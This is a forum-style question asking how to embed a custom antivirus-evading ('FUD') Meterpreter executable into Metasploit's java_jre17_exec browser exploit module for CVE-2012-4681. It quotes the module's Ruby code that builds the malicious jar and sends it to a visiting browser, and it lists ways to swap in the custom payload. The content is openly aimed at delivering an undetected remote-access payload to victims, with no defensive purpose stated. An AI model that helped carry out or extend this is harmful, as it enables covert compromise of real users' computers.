I'm trying to use java_jre17_exec with an applet having my custom exe meterpreter payload.
I've generated a FUD meterpreter binary and I want to embed it into a jar so I can use it with java_jre17_exec.
Here's the exploit:
/opt/metasploit/msf3/modules/exploits/multi/browser/java_jre17_exec.rb
The interesting lines are:
    p = regenerate_payload(cli)
    jar = p.encoded_jar
    paths.each do |path|
      1.upto(path.length - 1) do |idx|
        full = path[0,idx].join("/") + "/"
        if !(jar.entries.map{|e|e.name}.include?(full))
          jar.add_file(full, '')
        end
      end
      fd = File.open(File.join( Msf::Config.install_root, "data", "exploits", "CVE-2012-4681", path ), "rb")
      data = fd.read(fd.stat.size)
      jar.add_file(path.join("/"), data)
      fd.close
      #jar.each do |num| --------- tried to see what the jar array contains, but it doesn't show up in the console. Am I doing it wrong?
      #puts num
      #end
    end
    print_status("Sending Applet.jar")
    send_response( cli, jar.pack, { 'Content-Type' => "application/octet-stream" } )
    handler( cli )
end
I think "jar.pack" is the final result.
So I have the following options:
1) Have the "p" variable on the first line carry my custom binary, but I don't know which format "regenerate_payload()" accepts.
2) Create my own jar and replace it with "jar.pack".
3) Use "custom/generic" to supply the custom binary's shellcode, but unfortunately it doesn't support it. Why?
Do you have some ideas?
Thanks.